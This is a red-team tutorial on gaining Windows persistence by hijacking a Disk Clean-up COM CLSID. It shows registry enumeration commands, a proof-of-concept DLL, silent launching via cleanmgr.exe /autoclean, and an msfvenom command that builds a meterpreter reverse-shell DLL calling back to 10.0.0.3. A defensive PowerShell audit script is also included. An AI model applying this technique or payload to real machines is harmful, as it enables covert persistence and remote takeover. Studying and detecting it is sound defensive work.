Disk Clean-up is a utility that ships with Windows and frees hard drive space mainly by deleting cache and temporary files, which can improve system performance. It was introduced in Windows 98 and, although it has since been deprecated in favour of a modern equivalent in the Settings app, Microsoft has not removed it and keeps it as a legacy tool.
From a Red Teaming perspective, the Disk Clean-up utility can be used to establish persistence by executing arbitrary code whenever the utility starts. The method relies on COM hijacking: cleanmgr.exe, the binary that launches Disk Clean-up, consults the Windows registry for a number of DLLs when it starts, so hijacking one of the CLSIDs associated with Disk Clean-up results in code execution.
The list shown under Files to delete is built from the registry rather than being static. If elevation of privileges has been achieved, registry entries can be created that cause cleanmgr.exe to load an arbitrary DLL. The following registry keys are associated with the Disk Clean-up functionality:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID>
HKCU\Software\Classes\CLSID\{arbitrary-CLSID}
Executing the following command enumerates the registry keys that correspond to the Files to delete functionality:
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s
Of the registry keys listed, Downloaded Program Files is associated with the {8369AB20-56C9-11D0-94E8-00AA0059CE02} CLSID.
The same CLSID is also registered under the following registry key, which can be confirmed with:
reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
The following code can be used as a proof of concept to display a message box when the Disk Clean-up utility starts.
#include "pch.h"      // Visual Studio precompiled header; remove if the project does not use one
#include "windows.h"
#include "WinUser.h"

// Entry point called by the loader when cleanmgr.exe loads the hijacked in-process server.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Proof of concept: show a message box as soon as the DLL is mapped into the process.
        MessageBoxW(NULL, L"Visit pentestlab.blog", L"pentestlab", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
The CLSID to be hijacked needs to be created under the following registry key, with an InprocServer32 subkey under it whose default value points to the path of the arbitrary DLL. Because the per-user entries under HKCU\Software\Classes are merged into HKEY_CLASSES_ROOT ahead of the machine-wide entries, the per-user registration shadows the legitimate one.
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID
Executing the command below enumerates the hijacked CLSID to verify that it points to the arbitrary DLL.
reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
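The two reg query commands above show how the VolumeCaches handlers and a per-user CLSID registration look one at a time. The following PowerShell script is an added audit example, not code from the original post: it walks every handler under VolumeCaches, resolves the CLSID to the DLL that cleanmgr.exe would actually load, and flags any handler whose CLSID has a per-user InprocServer32 entry under HKCU (the condition the technique relies on) or whose effective DLL does not carry a valid Authenticode or catalog signature. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows; reading these keys does not require elevation. The function and variable names are this example's own.

```powershell
# Added audit script (not from the original post): enumerate Disk Clean-up handlers and
# flag per-user COM registrations that would shadow the machine-wide handler.
# Assumes Windows PowerShell 5.1 / PowerShell 7 on Windows.

$volumeCaches = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches'

# Return the DLL path from <CLSID key>\InprocServer32, or $null if the key is absent.
function Get-InprocServerPath {
    param([string]$ClsidKey)   # e.g. Registry::HKEY_CURRENT_USER\Software\Classes\CLSID\{...}
    $inproc = "$ClsidKey\InprocServer32"
    if (-not (Test-Path -LiteralPath $inproc)) { return $null }
    $raw = (Get-ItemProperty -LiteralPath $inproc).'(default)'
    if ([string]::IsNullOrWhiteSpace($raw)) { return $null }
    return [Environment]::ExpandEnvironmentVariables($raw)
}

# One record per VolumeCaches handler, with the DLL cleanmgr.exe would load and why it is (or is not) suspicious.
function Get-DiskCleanupHandler {
    foreach ($key in Get-ChildItem -LiteralPath $volumeCaches) {
        $clsid = (Get-ItemProperty -LiteralPath $key.PSPath).'(default)'
        if (-not $clsid) { continue }

        $userPath    = Get-InprocServerPath "Registry::HKEY_CURRENT_USER\Software\Classes\CLSID\$clsid"
        $machinePath = Get-InprocServerPath "Registry::HKEY_LOCAL_MACHINE\Software\Classes\CLSID\$clsid"

        # HKCU\Software\Classes is merged into HKCR ahead of HKLM, so a per-user entry wins.
        $effective = if ($userPath) { $userPath } else { $machinePath }

        $signature = 'Missing'
        if ($effective -and (Test-Path -LiteralPath $effective)) {
            # Get-AuthenticodeSignature also honours catalog signatures, so stock Windows DLLs report Valid.
            $signature = (Get-AuthenticodeSignature -FilePath $effective).Status
        }

        [pscustomobject]@{
            Handler      = $key.PSChildName
            CLSID        = $clsid
            EffectiveDll = $effective
            UserOverride = [bool]$userPath
            Signature    = $signature
            Suspicious   = ([bool]$userPath) -or ($signature -ne 'Valid')
        }
    }
}

Get-DiskCleanupHandler | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

On a clean host every handler should resolve to a catalog-signed DLL under the Windows directory with UserOverride set to False; any row with UserOverride True, or an unsigned or missing DLL, is worth pulling for analysis. Because the script reads only the current user's HKCU hive, run it in the context of each interactive user (or load their hives) when auditing a shared machine.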
Running cleanmgr.exe will execute the code. Note that the /autoclean parameter suppresses the Disk Clean-up graphical user interface, so nothing is displayed to the user. Furthermore, it could be combined with other Windows functionality such as registry Run keys or scheduled tasks to execute this binary at start-up or at a specific interval.
cleanmgr.exe
cleanmgr.exe /autoclean
cleanmgr.exe /setup
cleanmgr.exe /cleanup
The Metasploit Framework utility msfvenom can be used to generate a DLL automatically. Even though this is not a safe method and could lead to detection during a red team exercise, it is used here only for the purposes of the article.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll
As before, the DLL needs to be written to disk and the registry key must be modified to point to the new path.
Once Disk Clean-up is started the code will be executed and a meterpreter session will be established with the compromised host.
Originally published by pentestlab: Persistence – Disk Clean-up